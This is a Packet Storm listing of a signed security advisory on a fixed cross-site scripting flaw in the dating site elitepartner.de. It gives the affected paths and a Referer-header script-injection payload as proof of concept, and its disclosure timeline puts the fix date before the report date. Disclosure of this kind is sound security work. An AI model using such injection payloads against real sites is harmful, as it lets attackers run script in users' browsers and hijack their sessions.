ElitePartner.de Cross Site Scripting

2013-01-11T00:00:00
ID PACKETSTORM:119468
Type packetstorm
Reporter Stefan Schurtz
Modified 2013-01-11T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Advisory: www.elitepartner.de - Cross-site Scripting vulnerability  
Advisory ID: SSCHADV2012-024  
Author: Stefan Schurtz  
Affected Software: Successfully tested on www.elitepartner.de  
Vendor URL: http://www.elitepartner.de  
Vendor Status: fixed  
  
==========================  
Vulnerability Description  
==========================  
  
http://www.elitepartner.de is prone to a XSS vulnerability  
  
==========================  
PoC-Exploit  
==========================  
  
http://www.elitepartner.de/km/gfx/starthomepage/  
http://www.elitepartner.de/km/static/js/jquery/  
http://www.elitepartner.de/km/gfx/  
http://www.elitepartner.de/km/static/  
http://www.elitepartner.de/km/js/  
http://www.elitepartner.de/km/static/js/omniture/  
http://www.elitepartner.de/km/static/js/  
  
Referer: '"></style></script><script>alert(/huh/)</script>  
  
==========================  
Solution  
==========================  
  
fixed  
  
==========================  
Disclosure Timeline  
==========================  
  
23-Dec-2012 - informed by contact form  
10-Jan-2012 - fixed by developer  
  
==========================  
Credits  
==========================  
  
Vulnerability found and advisory written by Stefan Schurtz.  
  
==========================  
References  
==========================  
  
http://www.darksecurity.de/advisories/2012/SSCHADV2012-024.txt  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.12 (MingW32)  
Comment: Thunderbird-Portable 3.1.20 by GnuPT - Gnu Privacy Tools  
Comment: Download at: http://thunderbird.gnupt.de  
  
iEYEARECAAYFAlDvDJQACgkQg3svV2LcbMAcOQCeLfeDdv3GZSCIR3N5XWfzfNzr  
TuoAnieTg9xWXLpCkCtWe0J/A5nua7Po  
=9YP0  
-----END PGP SIGNATURE-----  
  
  
`